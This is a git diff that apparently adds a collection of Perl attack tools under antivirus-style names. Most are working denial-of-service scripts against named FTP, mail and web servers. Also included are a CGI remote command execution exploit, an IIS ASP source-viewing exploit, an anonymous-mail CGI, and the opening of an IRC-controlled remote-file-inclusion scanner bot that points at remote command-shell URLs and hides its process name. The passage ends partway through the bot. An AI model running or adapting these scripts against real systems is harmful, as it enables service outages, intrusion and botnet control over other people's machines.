12) { + $es .= "\x90"; + $c += 1; +}; +$es .= $payload; + +#print "$es"; + +$lsock = IO::Socket::INET->new(Proto=>"tcp", LocalHost=>$localhost, LocalPort=>$port, Listen=>1) || die "unable to create socket +.\n"; +print "waiting for connection on port $port..."; +$accsock = $lsock->accept(); +print "connected.\n"; +print $accsock "$es"; +sleep(5); +close($accsock); +close($lsock); + diff --git a/Perl/DoS.Perl.Meteor.a b/Perl/DoS.Perl.Meteor.a new file mode 100644 index 00000000..9ef4fea1 --- /dev/null +++ b/Perl/DoS.Perl.Meteor.a @@ -0,0 +1,31 @@ +# +# meteordos.pl - Remote denial of service against Meteor FTP Version 1.5 +# +# A vulnerability has been identified in Meteor FTP Version 1.5, which +# allows malicious users to remotely crash the ftpd. By connecting to the +# ftpd and issuing USER followed by large amounts of data, the server +# crashes. For more info, go to : +# http://www.evicted.org/projects/writings/mftpadvisory.txt +# +# Usage : ./meteordos.pl <host/ip> +# +# Vulnerability & code by zerash +# Contact : zerash@evicted.org + +use Net::FTP; +$host = $ARGV[0]; + +if("$ARGV[0]" eq "") { + print("DoS against Meteor FTP Version 1.5 by zerash\@evicted.org\n"); + die("Usage : ./meteorftpdos <host\/ip>\n"); +} else { + + print("Connecting to $host...\n"); + my $ftp = Net::FTP->new($host) or die "Couldn't connect to $host\n"; + print("Connected!\n"); + print("Attempting to exploit the ftpd..."); + $ftp->login('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'); + $ftp->quit; + print("Success!\n"); +} + diff --git a/Perl/DoS.Perl.Nertt b/Perl/DoS.Perl.Nertt new file mode 100644 index 00000000..7ca25b8d --- /dev/null +++ b/Perl/DoS.Perl.Nertt @@ -0,0 +1,29 @@ +# +# Jon Hittner +# Raise the memory size for omnilnet until Windows NT crashes +# Test against NT4.0 SP5 , NT3.51 , Winframe 1.7 SP5b , Winframe 1.8 +# Probably needs to be run several times to crash the system depending +# on the amount of memory in the system. +# This code was written to demo a problem, and I take no respoablity on how +# it's used + +use strict; use Socket; + +my($y,$h,$p,$in_addr,$proto,$addr); + +$h = "$ARGV[0]"; $p = 5555 if (!$ARGV[1]); +if (!$h) { print "A hostname must be provided. Ex: www.domain.com\n"; } + +$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); +$proto = getprotobyname('tcp'); +print "TESTING: $h:$p\n"; +for ($y=1 ; $y<2500000 ; $y++) { + socket(S, AF_INET, SOCK_STREAM, $proto); + connect(S,$addr) or next; + select S; + $| = 1; + select STDOUT; + send S,"OMNIBACK HAS SOME BIG ISSUES",0; + } +print "ATTACK COMPLETED!\n"; + diff --git a/Perl/DoS.Perl.Proxometron.a b/Perl/DoS.Perl.Proxometron.a new file mode 100644 index 00000000..9aa0f2b1 --- /dev/null +++ b/Perl/DoS.Perl.Proxometron.a @@ -0,0 +1,34 @@ +##################################################### +# Proxomitron - Universial Web Filter - Version 3 # +# Dos Attack. # +##################################################### + +use IO::Socket; + +$ARGC=@ARGV; +if ($ARGC !=2) { + print "\n-->"; + print "\tUsage: perl dos-prox.pl <host> <port>\n"; + exit; +} + +$vic = $ARGV[0]; # There IP +$Uport = $ARGV[1]; # There Web Port +$SendStr = "GET /" x 1000; # Crash String + +print "\n-->"; +print "\tCrashing:$vic on:$Uport\n"; +unless ($socket2 = IO::Socket::INET->new (Proto => "TCP", + PeerAddr => $vic, + PeerPort => $Uport)) +{ + print "-->"; + print "\tConnection Failed, Stoping.\n"; + exit; +} +print $socket2 "GET $SendStr\n"; +close $socket2; + +print "-->"; +print "\tCrashed:$vic\n"; +exit; \ No newline at end of file diff --git a/Perl/DoS.Perl.Raden b/Perl/DoS.Perl.Raden new file mode 100644 index 00000000..74683089 --- /dev/null +++ b/Perl/DoS.Perl.Raden @@ -0,0 +1,79 @@ +Who has more free file descriptors & network ports, you or the ftp server ? + +ftpd's which limit connections to 1 per user@host or similar may have some +defense against this, or if they don't support multiple data connections +open at the same time. I suspect "many" is the number of ftpd's which are +vulnderable to this attack so I've made no attempt (except in one case) to +contact vendors because there are just too many damn vendors, not to mention +ftpd's! But basically, if the other end has, on average, maximum fd limit +at 63, allows 50 connections, that's 3000 open fd's. I'm not sure how many +ftpd's are setup with that many open files as a part of the sytem, but not +many, I suspect. + +No apologies for using perl(5), I just wanted a quick prototype. It's not +perfect but then I did't want to spend too much time on this. + +to ftpd maintainers: +I don't know of any ftp clients which make use of this feature (multiple +data channels supported concurrently) as the original ftp clients were all +line-based and only suported one transfer at a time. Maybe this is +reasonable, but it would be a shame for the default defense to this attack +to mean you can't use FTP to it's full potential (i.e. start a transfer +from the current session but keep using the current `login' session, maybe +to start other transfers, as requried). Triming the number of concurrent +data sessions to a maximum of 1-5 (by default) would probably be enough, +with the capability to set this higher/lower as required. + +Darren + + + +$DOS_HOST="localhost"; + +use IO::Socket; + +$pid = $$; +$num = 0; + +while (1) { + while (fork) { + $sock = IO::Socket::INET->new( + Proto => "tcp", + PeerAddr => $DOS_HOST, + PeerPort => "ftp(21)", + ); + + if (!$sock) { + print "connect failed!\n"; + waitpid -1,0; + } + + + while (<$sock>) { + print; + print $sock "USER anonymous\r\n" if (/^220 .*/); + print $sock "PASS root@\r\n" if (/^331 .*/); + print $sock "PASV\r\n" if (/^230 .*/); + + if (/^227 .*/) { + $remote = $_; + $remote =~ s/^.* [^\d,]*(\d[\d,]+)[^\d,]*$/$1/; + @bits = split(/,/, $remote); + if ($#bits eq 5) { + $remport = $bits[4] * 256 + $bits[5]; + $#bits = 3; + $remip = join('.', @bits); + $foo[$num++] = IO::Socket::INET->new( + Proto => "tcp", + PeerAddr => $remip, + PeerPort => "($remport)"); + } + print $sock "PASV\r\n"; + } + last if (/^530 .*/); + } + waitpid -1,0; + } + sleep(5); +} + diff --git a/Perl/DoS.Perl.Shafolder b/Perl/DoS.Perl.Shafolder new file mode 100644 index 00000000..19260fe7 --- /dev/null +++ b/Perl/DoS.Perl.Shafolder @@ -0,0 +1,57 @@ +# +#Kazaa/Morpheus Denial of Service Attack +#Coded by Paul Godfrey +#PaulG@Crackdealer.com +# +#Problem: Both Kazaa and Morpheus filesharing applications have "backdoors" +#which allow anonymous file access to their shared folder. What does this have +#to do with Denial of Service? Unlike connections made from other users +#of the applications, the number of connections to the backdoor cannot be +#regulated or detected by the client. This obviously will allow us to flood the +#server with requests and therefore use up all of the available bandwidth. +#Also due to the fact that most users have setup their firewall privileges so +#that Kazaa or Morpheus is allowed access to open connections to outside sources +#this attack will bypass most personal firewall clients such as Zone Alarm. +# +#Enjoy. +# +#Usage: ./km.pl -h victimip + +use Socket; +use Getopt::Std; + +getopts("h:", \%args); + +print("\nK/M Denial of Service\n"); +if (!defined $args{h}) { +print("Usage: km.pl -h victimip\n\n"); +exit; } + +$host = $args{h}; +$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?"); + +$trash="A"x100; + +&exec_cmd($command); + +sub exec_cmd { +for($count=1;$count<=1000;$count++) +{ +sendraw("GET /\"$trash\" HTTP/1.0\n\n"); +print("|"); +} +print("\nData Sent.\n\n"); +} + +sub sendraw { +my ($pstr)=@_; +socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || +die("Socket problems\n"); +if(connect(S,pack "SnA4x8",2,1214,$target)){ +my @in; +select(S); $|=1; print $pstr; +while(< S >){ push @in, $_; +print STDOUT "." if(defined $args{X});} +select(STDOUT); close(S); return @in; +} else { die("Can't connect...\n"); } +} diff --git a/Perl/DoS.Perl.Small.a b/Perl/DoS.Perl.Small.a new file mode 100644 index 00000000..74efb38e --- /dev/null +++ b/Perl/DoS.Perl.Small.a @@ -0,0 +1,49 @@ +# ************************************************************** +# DoS for Linux kernels from 2.2.7 to 2.2.9 reported in BUGTRAQ +# 06/01/99 by Piotr Wilkin <pwl@wotan.2slo.wav.pl> +# An attacker has to be in same ethernet segment with victim +# I did't test it +# coded by misteri0 from P.A.T.C.H. +# Requires Net-RawIP-0.09 included in this directory +# Edited for use with toast by Gridmark +# ************************************************************** +$| = 1; +require 'getopts.pl'; +use Net::RawIP; +Getopts('t:'); +die " misteri0\@unet from P.A.T.C.H.\n Usage $0 -t <target>" unless +$opt_t; +srand(time); +$i = 996; +$data .= chr(int rand(255)),$i-- while($i); + +$icmp = new Net::RawIP({ + ip => { + ihl => 6, + tot_len => 1024, + id => 1, + ttl => 255, + frag_off => 0, + daddr => $opt_t + }, + icmp => { + id => 2650, + data => $data + } + }); + + $j++; + $icmp->set({ + ip => { saddr => 17000000 + int rand 4261000000 }, + icmp => { + type => int rand(14), + code => int rand(10), + sequence => int rand(255) + } + }); + $icmp->send; + print "Linux-DoS sent...\n" +# print "[b00m] " unless $j%1000; + + + diff --git a/Perl/DoS.Perl.Tedla b/Perl/DoS.Perl.Tedla new file mode 100644 index 00000000..1969e3cb --- /dev/null +++ b/Perl/DoS.Perl.Tedla @@ -0,0 +1,240 @@ +##################################################################### +# Rewted Network Security Labs - www.rewted.org # +# based upon advisories by USSR (www.ussrback.com) & Rewted.org # +# # +# Demonstration script to remotely overflow various server buffers, # +# resulting in a denial of service, for TESTING purposes only. # +# Runs on *nix & Windows with perl. # +# # +# G6 FTP Server v2.0 beta4/5 # +# MDaemon httpd Server v2.8.5.0 # +# Avirt Mail Server v3.5 # +# BisonWare FTP Server v3.5 # +# Vermillion FTP Server v1.23 # +# ZetaMail POP3 Server v2.1 # +# WFTPD FTP Server 2.40 # +# BFTelnet Server v1.1 # +# Broker FTP Server v3.5 # +# ExpressFS FTP server v2.x # +# XtraMail POP3 Server v1.11 # +# Cmail SMTP Server v2.4 # +# PakMail SMTP/POP3 v1.25 # +# # +# slackette - warminx@null.rewted.org # +# www.rewted.org www.rewted.org www.rewted.org www.rewted.org # +##################################################################### + +use IO::Socket; +use Getopt::Std; +getopts('h:p:t:u:v', \%args); +if(!defined($args{h}) && !defined($args{t})) { +print qq~Usage: $0 -h <victim> -t <number> ((-u username) | (-p password)) | -v + + -h victim to test remote overflow DoS on + -t server type (check the -v option for list) + -u username authorisation (required if server prompts for username) + -p password authentication (required if user/passwd is expected) + -v lists all servers vulnerable to each DoS + +~; exit; } + +if(defined($args{u})) { $user=$args{u}; } +if(defined($args{p})) { $pass=$args{p}; } +if(defined($args{v})) { &vulnerable; } +if(defined($args{h}) && defined($args{t})){ +if(($args{t}) == 1) { &G6; } +if(($args{t}) == 2) { &mdaemon; } +if(($args{t}) == 3) { &avirt; } +if(($args{t}) == 4) { &bisonware; } +if(($args{t}) == 5) { &vermillion; } +if(($args{t}) == 6) { &zetamail; } +if(($args{t}) == 7) { &wftpd; } +if(($args{t}) == 8) { &bftelnet; } +if(($args{t}) == 9) { &broker; } +if(($args{t}) == 10) { &expressfs; } +if(($args{t}) == 11) { &xtramail; } +if(($args{t}) == 12) { &cmail; } +if(($args{t}) == 13) { &pakmail; } +if(($args{t}) == 14) { &pakpop; }} + +sub G6 { +$denial .= "A" x 2000; +$victim=$args{h}; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "21") or die "Can't connect.\n"; + $socket->autoflush(1); +print $socket "$denial\n"; # user +print "\nSent overflow to $victim\n"; +close $socket; } + +sub mdaemon { +$victim=$args{h}; +$denial .= "A" x 1025; +$url = "/$denial"; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "80") or die "Can't connect.\n"; +print $socket "GET $url\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub avirt { +$victim=$args{h}; +$denial .= "A" x 856; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "25") or die "Can't connect\n"; + $socket->autoflush(1); +print $socket "user $user\n"; +print $socket "pass $denial\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub bisonware { +$victim=$args{h}; +$denial .= "A" x 2000; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "21") or die "Can't connect\n"; + $socket->autoflush(1); +print $socket "$denial\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub vermillion { +$victim=$args{h}; +$denial .= "A" x 504; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "21") or die "Can't connect\n"; + $socket->autoflush(1); +print $socket "$user\n"; +print $socket "$pass\n"; +print $socket "cwd $denial\n"; +# for(i=0; i<=3; i++) { print $socket "CWD $denial\n"; } +print "\nSent overflow to $victim\n"; +close $socket; } + +sub zetamail { +$victim=$args{h}; +$denial .= "A" x 3500; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "110") or die "Can't connect.\n"; +print $socket "user $denial\n"; +print $socket "pass $denial\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub wftpd { +$victim=$args{h}; +$denial .= "A" x 255; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "21") or die "Can't connect.\n"; +print $socket "$user\n"; +print $socket "$pass\n"; +print $socket "MKDIR $denial\n"; +print $socket "CWD $denial\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub bftelnet { +# use Net::Telnet; +$victim=$args{h}; +$denial .= "A" x 3090; +$telnet = new Net::Telnet ( Timeout =>10, + Errmode =>'die'); +$telnet->open('$victim'); +$telnet->waitfor('/Login: $/i'); +$telnet->print('$denial'); +print "\nSent overflow to $victim\n"; +close $telnet; } + +sub broker { +$victim=$args{h}; +$denial .= "A" x 2730; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "21") or die "Can't connect.\n"; +print $socket "$denial\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + + +sub expressfs { +$victim=$args{h}; +$denial .= "A" x 654; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "21") or die "Can't connect.\n"; +print $socket "$denial\n"; +print $socket "AAAAAAAAAAAAAAAAAAA\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub xtramail { +$victim=$args{h}; +$denial .= "A" x 2930; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "25") or die "Can't connect.\n"; +print $socket "MAIL FROM: test\@localhost\n"; +print $socket "RCPT TO: $denial\@localhost\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub cmail { +$victim=$args{h}; +$denial .= "A" x 7090; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "25") or die "Can't connect.\n"; +print $socket "MAIL FROM: $denial\@localhost\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub pakmail { +$victim=$args{h}; +$denial .= "A" x 1390; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "25") or die "Can't connect.\n"; +print $socket "MAIL FROM: test\@localhost\n"; +print $socket "RCPT TO: $denial\@localhost\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub pakpop { +$victim=$args{h}; +$denial .= "A" x 1400; + $socket = IO::Socket::INET->new (Proto => "tcp", + PeerAddr => $victim, + PeerPort => "110") or die "Can't connect.\n"; +print $socket "user test\n"; +print $socket "pass $denial\n"; +print "\nSent overflow to $victim\n"; +close $socket; } + +sub vulnerable { +print qq~ + ______________________________________________________________________________ + Vulnerable Daemon Version Vulnerable Daemon Version + ______________________________________________________________________________ + + [1] G6 FTP Server v2.0b4/5 [2] MDaemon httpd Server v2.8.5.0 + + [3] Avirt Mail Server v3.5 [4] BisonWare FTP Server v3.5 + + [5] Vermillion FTP Server v1.23 [6] ZetaMail SMTP Server v2.1 + + [7] WFTPD FTP Server v2.40 [8] BFTelnet Server v1.1 + + [9] Broker FTP Server v3.5 [10] ExpressFS FTP Server v2.x + +[11] XtraMail POP3 Server v1.11 [12] Cmail SMTP Server v2.4 + +[13] PakMail SMTP Server v1.25 [14] PakMail POP3 Server v1.25 + +~; exit; } \ No newline at end of file diff --git a/Perl/DoS.Perl.Vftp b/Perl/DoS.Perl.Vftp new file mode 100644 index 00000000..ee0c43be --- /dev/null +++ b/Perl/DoS.Perl.Vftp @@ -0,0 +1,50 @@ + +# Example for a possible DOS-attack against Vermillion FTP Daemon (VFTPD) v1.23. +# There need to be 504 characters to overflow Server. +# Example : Trying example.com... +# Connected to example.com. +# Escape character is '^]'. +# 220 itsme FTP Server (vftpd 1.23) ready. +# USER itsme +# PASS ****** +# CWD [504 characters] +# CWD [504 characters] +# CWD [504 characters] +# Overflow + +use IO::Socket; + +print "Possible DOS-attack against Vermillion FTP Daemon (VFTPD) v1.23\n"; +print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; + +if (not $ARGV[2]) { + print "Usage: $0 [host] [user] [pass]\n\n"; + exit(0); +} + +sub connecthost { + $host = IO::Socket::INET->new ( Proto => "tcp", + PeerAddr => $ARGV[0], + PeerPort => "21",) or die "Can't open connection to $ARGV[0] because $!\n"; + $host->autoflush(1); +} + +$bufferoverflow .= "A" x 504; + +print "\nOpen connection...\n"; +&connecthost; +print "Sending characters...\n"; +print $host "user $ARGV[1]\n"; +print $host "pass $ARGV[2]\n"; +print $host "cwd $bufferoverflow\n"; +print $host "cwd $bufferoverflow\n"; +print $host "cwd $bufferoverflow\n"; +print "close connection...\n"; +close $host; + +print "\nTesting...\n"; +&connecthost("\nThe host $ARGV[0] is vulnerable to this attack.\n"); +close $host; +die "The host $ARGV[0] is not vulnerable to this attack.\n"; + +# by arbon(arbon@gmx.de) diff --git a/Perl/DoS.Perl.Vqserver b/Perl/DoS.Perl.Vqserver new file mode 100644 index 00000000..33df7cc5 --- /dev/null +++ b/Perl/DoS.Perl.Vqserver @@ -0,0 +1,71 @@ +DHC Advisory +Advisory for vqServer 1.4.49 +vqServer is made by vqSoft. Site: http://www.vqsoft.com +by nemesystm of the DHC +(http://dhcorp.cjb.net - auto45040@hushmail.com) + +/-|=[explaination]=|-\ +When sending vqServer version 1.4.49 a malformed URL request it will crash +the service. This has been verified to work on the Windows version, but +it probably is in the linux/unix version and prior versions too. + +/-|=[testing it]=|-\ +To test this vulnerability, send a GET request with 65000 characters. +So: +GET /AAA (hit return =) +Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste +that much characters in their browser fields (www.server.com/AAA) you will +have to use something like Telnet. +You can easily program something to print 65000 chars in Perl: +open (OUT, ">$ARGV[0]"); +print OUT ("GET /"); +print OUT ("A" x 65000); +then it's just a cut and paste. +Or you can use the example code below + +/-|=[fix]=|-\ +the latest edition of vqServer (1.9.47) is unaffected by this. It is available +for download at www.vqsoft.com + +/-|=[notes]=|-\ +PUT, POST and the Administration port do not seem to be affected by a high +amount of characters. The Windows version needed a reinstall every five +or so crashes. A reboot or total shutdown did not help. + +/-|=[exploit code]=|-\ +sinfony quickly wrote some code so you can see if you're vulnerable. + +# DoS exploit for vqServer 1.4.49 +# This vulnerability was discovered by nemesystm +# (auto45040@hushmail.com) +# +# code by: sinfony (chinesef00d@hotmail.com) +# [confess.sins.labs] (http://www.ro0t.nu/csl) +# and DHC member +# +# kiddie quote of the year: +# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it + +die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n +usage: $0 <host> \n" +if $#ARGV != 0; + +use IO::Socket; + +$host = $ARGV[0]; +$port = 80; + +print "Connecting to $host on port $port...\n"; +$suck = IO::Socket::INET-> + new(Proto=>"tcp", + PeerAddr=>$host, + PeerPort=>$port) + || die "$host isnt a webserver you schmuck.\n"; + +$a = A; +$send = $a x 65000; + print "Connected, sending exploit.\n"; + print $suck "GET /$send\n"; +sleep(3); + print "Exploit sent. vqServer should be dead.\n"; +close($suck) \ No newline at end of file diff --git a/Perl/HackTool.Perl.AnonyMail b/Perl/HackTool.Perl.AnonyMail new file mode 100644 index 00000000..fa3d4833 --- /dev/null +++ b/Perl/HackTool.Perl.AnonyMail @@ -0,0 +1,101 @@ +# anonymail - fuck, i was bored like shit. napalmed. +$script_url = "/am.cgi"; +$sendmail = "/usr/sbin/sendmail"; +@referers = (""); +$admin = "napalmed@fuck.au"; +@friends = (""); +$good_refer = 0; +if($ENV{REQUEST_METHOD} eq 'GET') +{ +&print_form; +} +elsif($ENV{REQUEST_METHOD} eq 'POST') +{ + foreach $referer(@referers) + { + if($ENV{HTTP_REFERER} =~ /$referer/i) { $good_refer = 1; } + } + if($good_refer != 1) { &error; } +&parse_form; +&send_mail; +} +else +{ +&error; +} +sub print_form +{ +print "Content-type: text/html\n\n"; +print "<HTML><HEAD><TITLE>jhve elohim meth :: god is dead\n"; +print " ANONYMOUS MAIL. FUCK YOU
    \n"; +print " +
    +
    + + + + + + +
    BITCH
    Send To:
    From Address:
    From Name:
    Subject:
    Body:
    +
    \n"; +print "


    \n"; +exit; +} +sub send_mail +{ +open (MAIL, "|$sendmail -t") || &error; +print MAIL "From: $input{'from_name'} \<$input{'from_addy'}\>\n"; +print MAIL "Reply-To: $input{'from_addy'}\n"; +print MAIL "X-Mailer: anonmail.bitch\n"; +print MAIL "To: $input{'to'}\n"; +print MAIL "Subject: $input{'subject'}\n"; +print MAIL "Content-Type: text/plain; charset=us-ascii\n"; +print MAIL "Content-Transfer-Encoding: 7bit\n\n"; + +print MAIL "$input{'body'}"; +close (MAIL); + +print "Content-type: text/html\n\n"; +print "Below is what you sent to $input{to}\n
    \n";
    +print "From: $input{'from_name'} \<$input{'from_addy'}\>\n";
    +print "Reply-To: $input{'from_addy'}\n";
    +print "To: $input{'to'}\n";
    +print "Subject: $input{'subject'}\n\n";
    +print "$input{'body'}";
    +exit;
    +
    +}
    +
    +sub parse_form {
    +
    +   read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
    +   if (length($buffer) < 5) {
    +         $buffer = $ENV{QUERY_STRING};
    +    }
    +   @pairs = split(/&/, $buffer);
    +   foreach $pair (@pairs) {
    +      ($name, $value) = split(/=/, $pair);
    +
    +        $value =~ tr/+/ /;
    +        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
    +        $value =~ s///g;
    +        $input{$name} = $value;
    +   }
    +        if($input{'to'} =~ /microsoft.com/i) { &error; }
    +
    +        foreach $friend(@friends)
    +        {
    +        if($input{'to'} =~ /$friend/i) { &error; }
    +        }
    +}
    +
    +
    +
    +
    +sub error
    +{
    +print "Content-type: text/html\n\n";
    +print "
    An error occured while processing the script.\n"; +exit; +} \ No newline at end of file diff --git a/Perl/HackTool.Perl.Aspviewer b/Perl/HackTool.Perl.Aspviewer new file mode 100644 index 00000000..e6716a8f --- /dev/null +++ b/Perl/HackTool.Perl.Aspviewer @@ -0,0 +1,85 @@ +#----------------------------------------------------------------# +# [ISMyASP] # +# IIS ASP source code viewer using ISM.DLL buffer truncation bug # +# and null.htw bug # +# LoWNOISE Colombia 5/2000 # +# Efrain 'ET' Torres et@cyberspace.org # +#----------------------------------------------------------------# +# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb. # +#----------------------------------------------------------------# +# Some f() from wwwboard.pl by S.Sparling # +#----------------------------------------------------------------# + +use Socket; + +$port=80; + +if (!($ARGV[0])) { + print "\n[ISMyASP]\n"; + print "$0 http://host/view.asp \n"; + print "ET LoWNOISE Colombia.\n"; + exit; +} + +$url=$ARGV[0]; + +chop($url) if $url =~ /\n$/; +print "url: $url\n"; + +$remote = $url; +$remote =~ s/http\:\/\///g; +$remote =~ s/\/([^>]|\n)*//g; +print "host: $remote\n"; + +$path = $url; +$path =~ s/http\:\/\///g; +$path =~ s/$remote//g; +print "path: $path\n"; + + +$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t + #REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME + #READ THE CERBERUS CISADV000327. + +$submit = "GET $path"; + +$i=0; +while($i < $spaces) +{ + $submit= "$submit%20"; + $i++; + +} +$submit= "$submit.htr HTTP/1.0\n\n"; + +print "======Trying ism.dll buffer truncation...\n"; +print "submit: $submit\n\n"; + +&post_message; + +print "======Trying null.htw...\n"; +$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n"; +print "submit: $submit\n\n"; + +&post_message; + +sub post_message +{ + if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); } + die("No port specified.") unless $port; + $iaddr = inet_aton($remote) || die("Failed to find host: $remote"); + $paddr = sockaddr_in($port, $iaddr); + $proto = getprotobyname('tcp'); + socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!"); + connect(SOCK, $paddr) || die("Unable to connect: $!"); + send(SOCK,$submit,0); + printf "\n======Waiting for reply [pray]....\n\n"; + while() { + print $_; + } + close(SOCK); +} + +print "\n\n======THE END. [LoWNOISE]\n"; +exit; +#:) narco.guerrilla&gov.sucks.co (huge :x to PO-K) diff --git a/Perl/HackTool.Perl.Cgiluder.b b/Perl/HackTool.Perl.Cgiluder.b new file mode 100644 index 00000000..e29d9c41 --- /dev/null +++ b/Perl/HackTool.Perl.Cgiluder.b @@ -0,0 +1,85 @@ +# +# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r] +# +# C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend! +# +# I think the bug was discovered by Francisco Alisson. +# +# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm. +# +# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b. +# +########################################################################## +# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1 +# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r] +# [?] Insert command: id +# [+] Conecting to 127.0.0.1 +# [+] Connected to 127.0.0.1 +# [+] Injecting command ... +# uid=500(kc) gid=500(kc) gruppi=500(kc) +# [kc@K-C0d3r xpl]$ +########################################################################## + +use IO::Socket; + +sub Usage { +print STDERR "Usage:\nKCinc-xpl.pl .\n"; +print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n"; +exit; +} + +if (@ARGV < 3) +{ + Usage(); +} + + +$host = @ARGV[0]; +$path = @ARGV[1]; +print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n"; +print "[?] Insert command: "; +$command = ; +$type = @ARGV[2]; + +if ($type > 2) +{ + Usage(); +} + + +print "[+] Conecting to $host\n"; + +if ($type = 1) +{ +$injection = "$host$path?|$command|"; +$socket = new IO::Socket::INET (PeerAddr => "$host", + PeerPort => 80, + Proto => 'tcp'); + die unless $socket; +print "[+] Connected to $host\n"; +print "[+] Injecting command ...\n"; +print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n"; +while (<$socket>) +{ + print $_; + exit; +} +} + +if ($type = 2) +{ +$injection = "$host$path?template=|$command|"; +$socket = new IO::Socket::INET (PeerAddr => "$host", + PeerPort => 80, + Proto => 'tcp'); + die unless $socket; +print "[+] Connected to $host\n"; +print "[+] Injecting command\n"; +print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n"; +while (<$socket>) +{ + print $_; + exit; +} +} + diff --git a/Perl/HackTool.Perl.IrBot.c b/Perl/HackTool.Perl.IrBot.c new file mode 100644 index 00000000..bb1d07f6 --- /dev/null +++ b/Perl/HackTool.Perl.IrBot.c @@ -0,0 +1,248 @@ +################################################################################################################################################# +# +# RFi Scanner 2007 by Morgan.. +# +# <@Morgan> !scan page.php?id= "Powered by RGameScript" +# [Scan] Started: page.php?id= - Dork: "Powered by RGameScript" Engine: Google +# [Scan] Google Found: 1656 Sites! +# [Scan] Cleaned results: 36 Sites! +# [Scan] Exploting started! +# [SafeON] [Sys Linux] [Free 36.55 GB ] http://gry.nakazdytemat.pl/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg? +# [Information] Linux blackhawk.avx.pl 2.6.19.2 #4 SMP Fri Feb 2 11:51:02 CET 2007 i686 +# [SafeOFF] [Sys Linux] [Free 26.26 GB ] http://allgamesallfree.org/page.php?id=http://usuarios.arnet.com.ar/larry123/cmd.jpg? +# [Information] Linux games.allgamesallfree.com 2.6.9-55.0.2.ELsmp #1 SMP Tue Jun 26 14:30:58 EDT 2007 i686 +# [Scan] Scan Finished "Powered by RGameScript" +# +# +# Enjoy! +# /Morgan +# +# irc.realworm.net - #Morgan +################################################################################################################################################# + +use IO::Socket::INET; +use HTTP::Request; +use LWP::UserAgent; + +###############CONFIGURATION################### +my $processo = "/usr/local/apache/bin/nscan -DSSL"; +my $printcmd="http://www.animedinasty.org/cmd/info.jpg?"; #<---- Change this for your CMD +my $server="irc.x-reaction.net"; +my $porta="6667"; +my $nick="x____H264____x"; +my $chan="#a"; +###############END OF CONFIGURATION############ + +my $verbot = "2.0"; +my $cmd="http://www.greenkorea.ph/bbs/data/_metal/safe.txt?"; #Never change this +my $pid=fork; +exit if $pid; +$0="$processo"."\0"x16; +my $sk = IO::Socket::INET->new(PeerAddr=>"$server",PeerPort=>"$porta",Proto=>"tcp") or die "Can not connect on server!\n"; 